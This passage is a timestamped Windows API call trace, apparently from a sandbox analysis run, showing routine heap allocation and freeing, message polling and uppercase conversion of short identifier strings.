lpMem=0x2aa9e20 | out: hHeap=0x2af0000) returned 1 [0087.660] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e80 | out: hHeap=0x2af0000) returned 1 [0087.660] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0087.660] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0087.660] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e98 [0087.660] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9cb8 [0087.660] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a718f8 [0087.660] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c88 [0087.660] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0087.660] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c88 | out: hHeap=0x2af0000) returned 1 [0087.660] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9cb8 | out: hHeap=0x2af0000) returned 1 [0087.660] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e98 | out: hHeap=0x2af0000) returned 1 [0087.660] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0087.660] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0087.660] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b20 | out: hHeap=0x2af0000) returned 1 [0087.660] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0087.660] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0087.660] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c10 | out: hHeap=0x2af0000) returned 1 [0087.660] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0087.660] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a48 | out: hHeap=0x2af0000) returned 1 [0087.660] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0087.660] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0087.660] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0087.660] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0087.660] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ac0 | out: hHeap=0x2af0000) returned 1 [0087.660] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9eb0 | out: hHeap=0x2af0000) returned 1 [0087.661] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d60 | out: hHeap=0x2af0000) returned 1 [0087.661] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9da8 | out: hHeap=0x2af0000) returned 1 [0087.661] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d78 | out: hHeap=0x2af0000) returned 1 [0087.661] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74508 | out: hHeap=0x2af0000) returned 1 [0087.661] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0087.661] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74550 | out: hHeap=0x2af0000) returned 1 [0087.661] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a30 | out: hHeap=0x2af0000) returned 1 [0087.661] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0087.661] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a718f8 [0087.661] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78228 [0087.661] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71898 [0087.661] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0087.661] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78228 | out: hHeap=0x2af0000) returned 1 [0087.661] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0087.661] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa99a0 [0087.661] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a748f8 [0087.661] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0087.661] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0087.661] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a38 [0087.661] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99b8 [0087.661] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99d0 [0087.661] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0087.661] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bf8 [0087.661] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0087.661] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b48 [0087.661] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ff8 [0087.661] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0087.661] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ff8 | out: hHeap=0x2af0000) returned 1 [0087.661] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0087.661] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0087.661] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0087.662] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0087.662] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0087.662] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0087.662] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e6c0 [0087.662] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0087.662] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e6c0 | out: hHeap=0x2af0000) returned 1 [0087.662] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0087.662] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0087.662] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0087.662] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a30 [0087.662] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c28 [0087.662] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0087.662] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bf8 [0087.662] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0087.662] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0087.662] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0087.662] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a30 | out: hHeap=0x2af0000) returned 1 [0087.662] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0087.662] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0087.662] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a748f8 | out: hHeap=0x2af0000) returned 1 [0087.662] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0087.662] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0087.662] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7120 [0087.662] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99d0 [0087.662] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a30 [0087.662] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0087.662] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a78 [0087.662] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0087.662] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0087.662] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a30 | out: hHeap=0x2af0000) returned 1 [0087.663] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0087.663] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7120 | out: hHeap=0x2af0000) returned 1 [0087.663] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0087.663] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0087.663] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ebc0 [0087.663] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0087.663] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ebc0 | out: hHeap=0x2af0000) returned 1 [0087.663] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0087.663] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0087.663] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0087.663] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0087.663] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0087.663] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a718f8 [0087.663] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0087.663] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6fe0 [0087.663] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0087.663] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c10 [0087.663] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bf8 [0087.663] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0087.663] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b08 [0087.663] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0087.663] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0087.663] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0087.663] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c10 | out: hHeap=0x2af0000) returned 1 [0087.663] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0087.663] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0087.663] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fe0 | out: hHeap=0x2af0000) returned 1 [0087.663] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0087.663] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0087.663] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e880 [0087.664] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0087.664] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0087.664] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0087.664] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99d0 [0087.664] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a718f8 [0087.664] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a78 [0087.664] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99b8 [0087.664] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0087.664] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bf8 [0087.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0087.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0087.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0087.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0087.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0087.664] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99b8 [0087.664] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a718f8 [0087.664] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bf8 [0087.664] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c10 [0087.664] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0087.664] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c28 [0087.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0087.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0087.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c10 | out: hHeap=0x2af0000) returned 1 [0087.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0087.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0087.664] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c28 [0087.664] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a718f8 [0087.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0087.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0087.664] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0087.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0087.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0087.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0087.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e880 | out: hHeap=0x2af0000) returned 1 [0087.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0087.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a00 | out: hHeap=0x2af0000) returned 1 [0087.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78048 | out: hHeap=0x2af0000) returned 1 [0087.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0087.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78408 | out: hHeap=0x2af0000) returned 1 [0087.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0087.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a60 | out: hHeap=0x2af0000) returned 1 [0087.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0087.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0087.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7698 | out: hHeap=0x2af0000) returned 1 [0087.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0087.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78138 | out: hHeap=0x2af0000) returned 1 [0087.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0087.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78098 | out: hHeap=0x2af0000) returned 1 [0087.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0087.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fa8 | out: hHeap=0x2af0000) returned 1 [0087.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0087.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78160 | out: hHeap=0x2af0000) returned 1 [0087.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9af0 | out: hHeap=0x2af0000) returned 1 [0087.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0087.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0087.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ad8 | out: hHeap=0x2af0000) returned 1 [0087.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9850 | out: hHeap=0x2af0000) returned 1 [0087.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0087.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0087.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0087.666] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0087.666] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0087.666] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9718 | out: hHeap=0x2af0000) returned 1 [0087.666] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0087.666] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78188 | out: hHeap=0x2af0000) returned 1 [0087.666] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0087.666] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0087.666] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71868 [0087.666] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0087.666] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78458 | out: hHeap=0x2af0000) returned 1 [0087.666] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0087.666] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9670 [0087.666] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0087.666] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0087.666] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0087.666] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a718f8 [0087.666] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0087.666] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9700 [0087.666] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0087.666] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9820 [0087.666] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0087.666] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71868 [0087.666] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78110 [0087.666] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0087.666] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78110 | out: hHeap=0x2af0000) returned 1 [0087.666] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0087.666] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0087.666] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0087.666] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0087.666] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0087.667] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0087.667] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ecc0 [0087.667] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0087.667] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ecc0 | out: hHeap=0x2af0000) returned 1 [0087.667] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0087.667] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78278 [0087.667] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a717c8 [0087.667] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0087.667] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78278 | out: hHeap=0x2af0000) returned 1 [0087.667] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0087.667] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa97c0 [0087.667] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0087.667] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0087.667] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0087.667] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0087.667] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0087.667] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9778 [0087.667] RtlAllocateHeap 